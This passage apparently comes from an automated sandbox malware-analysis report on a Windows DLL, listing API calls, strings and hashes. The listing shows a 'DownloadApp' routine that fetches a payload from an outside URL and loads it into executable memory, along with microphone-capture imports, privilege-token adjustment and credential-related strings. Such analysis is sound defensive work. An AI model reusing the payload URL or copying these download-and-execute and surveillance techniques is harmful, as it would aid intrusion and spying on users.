                                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,80000000,00000000), ref: 10020871
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D14A3D8,1011F970,?,?,?,1002128D,?,00000001,?,?,00000001), ref: 1002088A
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(00000000,?,00000001), ref: 10020894
                                                  • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,00000000,?,00000001), ref: 1002089A
                                                  • InternetCloseHandle.WININET(00000000), ref: 100208A4
                                                  • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,00000000,?,00000001), ref: 100209B0
                                                  Strings
                                                  • DownloadApp, xrefs: 10020826
                                                  • https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt, xrefs: 1002081D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: U?$char_traits@$V?$basic_ostream@$??6std@@D@std@@@0@InternetV10@$?endl@std@@D@std@@@1@OpenV21@@$CloseD@2@@0@@D@std@@HandleV?$allocator@V?$basic_string@
                                                  • String ID: DownloadApp$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt
                                                  • API String ID: 2470020359-224967001
                                                  • Opcode ID: 589eb7055f473983a5c73d51515f5a119968cbfe1b0e0dcbff1243ebfbe0ea12
                                                  • Instruction ID: f4075456ea2211239c32e77bee8ba72b102daa7ef1349c37812ad300117944eb
                                                  • Opcode Fuzzy Hash: 589eb7055f473983a5c73d51515f5a119968cbfe1b0e0dcbff1243ebfbe0ea12
                                                  • Instruction Fuzzy Hash: 1D41E439600315BBF220EB74DC89FDB37ECFB48B51F080619FE48A6191D674B9008B65
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,ResumeThread,00000000,?,00000000,7556F550), ref: 100015B9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100015C2
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateThread,?,00000000,7556F550), ref: 100015D2
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100015D5
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInOpen,?,00000000,7556F550), ref: 100015E5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100015E8
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInGetNumDevs,?,00000000,7556F550), ref: 100015F8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100015FB
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInPrepareHeader,?,00000000,7556F550), ref: 10001609
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000160C
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer,?,00000000,7556F550), ref: 1000161C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000161F
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInStart,?,00000000,7556F550), ref: 1000162F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001632
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: CreateThread$KERNEL32.dll$ResumeThread$WINMM.dll$waveInAddBuffer$waveInGetNumDevs$waveInOpen$waveInPrepareHeader$waveInStart
                                                  • API String ID: 2574300362-1356117283
                                                  • Opcode ID: b16c15dad6be20392214e3733c7d2997f9670e9390d019f32002513cfd113147
                                                  • Instruction ID: 9f0f930b95cd2c35929b0060be92cf7d2e31dda6e2d7e4543e4cf746f9a0d286
                                                  • Opcode Fuzzy Hash: b16c15dad6be20392214e3733c7d2997f9670e9390d019f32002513cfd113147
                                                  • Instruction Fuzzy Hash: 97414CB5900308ABDB10EFA5DC88E9BBBA8EF89350F15095AFA4497201D739E545CBA1
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00000100), ref: 1000206D
                                                  • GlobalLock.KERNEL32(00000000), ref: 1000208C
                                                  • GlobalFree.KERNEL32(00000000), ref: 10002099
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Global$AllocFreeLock
                                                  • String ID:
                                                  • API String ID: 1811133220-0
                                                  • Opcode ID: 7b0ad0f25f4a2cddc16766b0e6d97ebd1ec4d88260b312a24f329dad41576865
                                                  • Instruction ID: 31745eacba11bb791e4eb93f153fa9c76b873c6e0b346c95d442a480799836a0
                                                  • Opcode Fuzzy Hash: 7b0ad0f25f4a2cddc16766b0e6d97ebd1ec4d88260b312a24f329dad41576865
                                                  • Instruction Fuzzy Hash: AB71C1B6610301ABD310CF54CC89F9AB3B4FF54714F569608E608AF2B1E3B4E549C7AA
                                                  APIs
                                                  • _access.MSVCRT ref: 100211E6
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1002121E
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 10021244
                                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt,?,?,00000001), ref: 10021276
                                                  • #825.MFC42(?,?,00000001), ref: 100212AC
                                                  • #825.MFC42(?,?,00000001), ref: 100212D9
                                                  • Sleep.KERNEL32(000000C8), ref: 100212E6
                                                  • CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\7.txt,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10021301
                                                  • MessageBoxA.USER32(00000000,1011F9D8,1011F9E8,00000000), ref: 1002131C
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10021328
                                                  • MessageBoxA.USER32(00000000,1011F9C4,1011F9E8,00000000), ref: 10021343
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 10021358
                                                  • MessageBoxA.USER32(00000000,1011F9B4,1011F9E8,00000000), ref: 10021375
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10021384
                                                  • CloseHandle.KERNEL32(00000000), ref: 10021394
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 100213AC
                                                  • CloseHandle.KERNEL32(00000000), ref: 100213EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@2@@std@@D@std@@FileMessageU?$char_traits@V?$allocator@$#825CloseHandleVirtual$?assign@?$basic_string@AllocCreateEos@?$basic_string@FreeGrow@?$basic_string@ReadSizeSleepV12@_access
                                                  • String ID: C:\Users\Public\Documents\MM\7.txt$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt$runas
                                                  • API String ID: 1859234541-2290419671
                                                  • Opcode ID: 33137425a6d22025152473852b37577924805ffe1fcf84fc13753eaa20bb0989
                                                  • Instruction ID: a423ea155a4f305ca4cd6c16e0ba3fae471ac5244e27810a6df4c9cfc6c4e3d5
                                                  • Opcode Fuzzy Hash: 33137425a6d22025152473852b37577924805ffe1fcf84fc13753eaa20bb0989
                                                  • Instruction Fuzzy Hash: E161F678A01658ABD714DFA89C49BDDBBB4FF25B10F540229F905F72C0C7745A44C764
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005335
                                                  • LoadLibraryA.KERNEL32 ref: 10005386
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005389
                                                  • LoadLibraryA.KERNEL32(?,IsValidSid), ref: 10005397
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000539A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: .23$2$3$ConvertSidToStringSidA$D$FreeLibrary$I$IsValidSid$L$_RasDefaultCredentials#0$LookupAccountNameA$P$V$kernel32.dll
                                                  • API String ID: 2574300362-2447002180
                                                  • Opcode ID: 0e49161b9a27eb155e0ea2c7e22d683dee310b1aad9c37f06d238c71156bed93
                                                  • Instruction ID: 223027d79037198c63e6ca2b5f055af27ccc184e3b8335a544396f1f5ed8738e
                                                  • Opcode Fuzzy Hash: 0e49161b9a27eb155e0ea2c7e22d683dee310b1aad9c37f06d238c71156bed93
                                                  • Instruction Fuzzy Hash: D631A472108385AED300DB68DC44AEFBFD8EFD5255F440A5EF58482241D7A9D60C8BB3
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1002C6B7
                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1002C6E8
                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1002C6F4
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1002C750
                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1002C758
                                                  • CloseHandle.KERNEL32(?), ref: 1002C76A
                                                  • FreeLibrary.KERNEL32(00000000), ref: 1002C77B
                                                  • FreeLibrary.KERNEL32(?), ref: 1002C786
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                  • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$kernel32.dll$Wu
                                                  • API String ID: 2887716753-1914032395
                                                  • Opcode ID: a14aad5105d2b35b6efed5fab13a5fa881ab0182d38bfdd77f0580a3c1bccf81
                                                  • Instruction ID: cdba08fcab1ab18a427d8be8ec3418e3e3881b817c76f5951e8ed3d00d165c74
                                                  • Opcode Fuzzy Hash: a14aad5105d2b35b6efed5fab13a5fa881ab0182d38bfdd77f0580a3c1bccf81
                                                  • Instruction Fuzzy Hash: 5B21B4716043456BD300DB75DC88FABBBE8EFC8654F444A1DF644A3140DB78E9448B66
                                                  APIs
                                                  • #354.MFC42(?,0000000C,?,?,?,?,?,?,00000000), ref: 10008140
                                                  • #5186.MFC42 ref: 1000815A
                                                  • #665.MFC42 ref: 1000816F
                                                  • #540.MFC42(?), ref: 1000818F
                                                  • #537.MFC42(?,?), ref: 1000819E
                                                  • #4204.MFC42(?,?), ref: 100081DA
                                                  • #2915.MFC42(00000080,?,?), ref: 100081EA
                                                  • #5442.MFC42(00000000,?,00000080,?,?), ref: 10008231
                                                  • #5572.MFC42(00000000,00000000,?,00000080,?,?), ref: 10008240
                                                  • #6874.MFC42(00000000,00000000,00000000,?,00000080,?,?), ref: 1000824B
                                                  • #4204.MFC42(00000000,00000000,00000000,?,00000080,?,?), ref: 10008254
                                                  • #2764.MFC42(00000000,00000000,00000000,00000000,?,00000080,?,?), ref: 10008262
                                                  • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 100082AA
                                                  • #1979.MFC42(00000000,?,0000000C,?,?,?,?,?,?,00000000), ref: 100082C2
                                                  • #800.MFC42 ref: 100082D0
                                                  • #800.MFC42 ref: 100082DE
                                                  • #665.MFC42 ref: 100082EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #4204#665#800$#1979#2764#2915#354#5186#537#540#5442#5572#6874Message
                                                  • String ID: $warning
                                                  • API String ID: 2155908909-2294955047
                                                  • Opcode ID: b7a10fa7eb8944d18d13460551dd7360e5263809a6bbceb2fc578ba8707b7c8b
                                                  • Instruction ID: b4b68b6e23a7d09b6ce465dfb8390c6dd5d130876c17849a93006b1a7f2b686e
                                                  • Opcode Fuzzy Hash: b7a10fa7eb8944d18d13460551dd7360e5263809a6bbceb2fc578ba8707b7c8b
                                                  • Instruction Fuzzy Hash: C751E0751087459BD348DF64D991B9BB7E1FF94710F800A2DF99693285DB30AE08CB92
                                                  APIs
                                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
                                                  • GetLocalTime.KERNEL32(?), ref: 1001E4CE
                                                  • sprintf.MSVCRT ref: 1001E599
                                                  • WriteFile.KERNEL32 ref: 1001E5EE
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001E5F5
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                    • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                    • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFileLibraryLoadProc$CloseCreateHandleLocalTimeWritesprintf
                                                  • String ID: $-$4$:$C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e$i$k$m$r
                                                  • API String ID: 694383593-1605913938
                                                  • Opcode ID: d024a1370f35b67469d2fddd4eadffe5950b14aad45106a9a881e02aa87f9513
                                                  • Instruction ID: 2097e82258319263d28a0c46b04399a4516b76f2585dd24dc8188860d4cfe16a
                                                  • Opcode Fuzzy Hash: d024a1370f35b67469d2fddd4eadffe5950b14aad45106a9a881e02aa87f9513
                                                  • Instruction Fuzzy Hash: 58516F7110D3C09EE311CB28C844B9BBFD5ABEA308F484A5DF5D967292C6B59608CB67
                                                  APIs
                                                    • Part of subcall function 10007940: #541.MFC42(?,?,?,10097D2B,000000FF), ref: 10007960
                                                    • Part of subcall function 10007940: #540.MFC42(?,?,?,10097D2B,000000FF), ref: 10007970
                                                  • #540.MFC42(?,?,00000000,00000065), ref: 10009F4E
                                                  • #540.MFC42 ref: 10009F5F
                                                  • #540.MFC42 ref: 10009F70
                                                  • #2614.MFC42 ref: 10009F81
                                                  • #860.MFC42(*.*), ref: 10009F8F
                                                  • #3811.MFC42(?,*.*), ref: 10009FB5
                                                  • #3811.MFC42(?,?,*.*), ref: 10009FC5
                                                  • #3811.MFC42(?,?,?,*.*), ref: 10009FD5
                                                  • #3811.MFC42(?,?,?,?,*.*), ref: 10009FE5
                                                  • #3811.MFC42(?,?,?,?,?,*.*), ref: 10009FF5
                                                  • #3811.MFC42(?,?,?,?,?,?,*.*), ref: 1000A005
                                                  • #860.MFC42(?,?,?,?,?,?,?,*.*), ref: 1000A033
                                                  • #2818.MFC42(?,*%s*,?,?,?,?,?,?,?,?,*.*), ref: 1000A04A
                                                  • #860.MFC42(?,?,00000000,00000065), ref: 1000A097
                                                  • #800.MFC42 ref: 1000A0D2
                                                  • #800.MFC42 ref: 1000A0E3
                                                  • #800.MFC42 ref: 1000A0F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #3811$#540$#800#860$#2614#2818#541
                                                  • String ID: *%s*$*.*
                                                  • API String ID: 185796673-1558234275
                                                  • Opcode ID: 6abb6b1f1cb9d99256978181ee2c38739354c8b016ba86206848d68570f9c942
                                                  • Instruction ID: ee2751bb99efb5b8e8624e7515bc667b61434bbdc0d3475f74e87a486019deaf
                                                  • Opcode Fuzzy Hash: 6abb6b1f1cb9d99256978181ee2c38739354c8b016ba86206848d68570f9c942
                                                  • Instruction Fuzzy Hash: 9B5146754083858FC325CFA4C591AABFBE5FFD9700F840A2DB59983292DB74A508CB63
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,SetEvent), ref: 10001329
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001332
                                                  • LoadLibraryA.KERNEL32 ref: 100013A4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100013A7
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(KERNEL32.dll,ResumeThread,00000000,?,00000000,7556F550), ref: 100015B9
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015C2
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateThread,?,00000000,7556F550), ref: 100015D2
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015D5
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInOpen,?,00000000,7556F550), ref: 100015E5
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015E8
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInGetNumDevs,?,00000000,7556F550), ref: 100015F8
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015FB
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInPrepareHeader,?,00000000,7556F550), ref: 10001609
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 1000160C
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer,?,00000000,7556F550), ref: 1000161C
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 1000161F
                                                    • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInStart,?,00000000,7556F550), ref: 1000162F
                                                    • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 10001632
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: F$KERNEL32.dll$O$S$SetEvent$W$a$b$c$g$j$l$n$o$r
                                                  • API String ID: 2574300362-1789360232
                                                  • Opcode ID: 8681ca1b1b33f73bda7f61c2a29eb6732c7a1b4a0c27a5eda15d591767e8de8a
                                                  • Instruction ID: 6d0500b828a3b4bacedf277e9e204f21e6ad90e68e93e0fee001a8a00f1ea147
                                                  • Opcode Fuzzy Hash: 8681ca1b1b33f73bda7f61c2a29eb6732c7a1b4a0c27a5eda15d591767e8de8a
                                                  • Instruction Fuzzy Hash: 7531C26110C3C08ED301DA6D9840B9BFFD59FA6658F090A9EE5C857343C6AAD61CC7BB
                                                  APIs
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,00000001,00000001), ref: 1000724A
                                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 100072B9
                                                  • GetFileAttributesA.KERNEL32(?), ref: 100072C9
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100072F2
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10007301
                                                  • malloc.MSVCRT ref: 1000730E
                                                  • ReadFile.KERNEL32(?,00000000,?,0000023D,00000000), ref: 10007335
                                                  • CloseHandle.KERNEL32(?), ref: 10007342
                                                  • free.MSVCRT ref: 10007378
                                                  • lstrlenA.KERNEL32(?), ref: 100073F9
                                                  • lstrlenA.KERNEL32(?), ref: 10007418
                                                  • lstrlenA.KERNEL32(?), ref: 10007427
                                                  • lstrlenA.KERNEL32(?), ref: 10007449
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10007457
                                                  • lstrlenA.KERNEL32(?), ref: 10007476
                                                  • lstrlenA.KERNEL32(?), ref: 10007493
                                                  • LocalReAlloc.KERNEL32(00000000,-00000002,00000042), ref: 100074A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$File$AllocLocal$AttributesCloseCreateFolderHandlePathReadSizeSpecialfreemalloc
                                                  • String ID: Version
                                                  • API String ID: 2101459175-1889659487
                                                  • Opcode ID: 2247f92c777c14eff78654b7276251a4fefb10210063c3daf73eb663d2b26340
                                                  • Instruction ID: 83b2c9fbb4ddd666ab596bed14113dd1762a442ba6db59ffbdd1d5f5b3623690
                                                  • Opcode Fuzzy Hash: 2247f92c777c14eff78654b7276251a4fefb10210063c3daf73eb663d2b26340
                                                  • Instruction Fuzzy Hash: 1A61C5756002045BE728DB78CC99BEB3795FB88310F584B2DFE1ADB2D5DB74AA04C660
                                                  APIs
                                                  • #2614.MFC42(00000000,?), ref: 100110F5
                                                  • #2614.MFC42(00000000,?), ref: 100110FD
                                                  • #6143.MFC42(00000000,000000FF,00000000,?), ref: 10011110
                                                  • #2614.MFC42(00000000,000000FF,00000000,?), ref: 1001111C
                                                    • Part of subcall function 10012190: #825.MFC42(?,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121D1
                                                  • #860.MFC42(?,00000000,000000FF,00000000,000000FF,00000000,?), ref: 10011137
                                                  • PathGetArgsA.SHLWAPI(00000000,?), ref: 10011172
                                                  • #860.MFC42(00000000), ref: 1001117C
                                                  • PathRemoveArgsA.SHLWAPI(00000000), ref: 10011186
                                                  • PathUnquoteSpacesA.SHLWAPI(00000000,?), ref: 10011191
                                                  • _splitpath.MSVCRT ref: 100111C5
                                                  • #860.MFC42(?,?,?,?,?), ref: 100111D6
                                                  • #860.MFC42(?,?,?,?,?,?), ref: 100111E8
                                                  • #6876.MFC42(0000002F,0000005C,?,?,?,?,?,?), ref: 100111F3
                                                  • #858.MFC42 ref: 10011237
                                                  • #800.MFC42 ref: 1001124A
                                                  • #941.MFC42(?), ref: 10011259
                                                  • #858.MFC42 ref: 1001127E
                                                  • #800.MFC42 ref: 1001128E
                                                  • #860.MFC42(?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112A0
                                                  • #860.MFC42(?,?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112BE
                                                  • #6874.MFC42(0000002E,?,?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
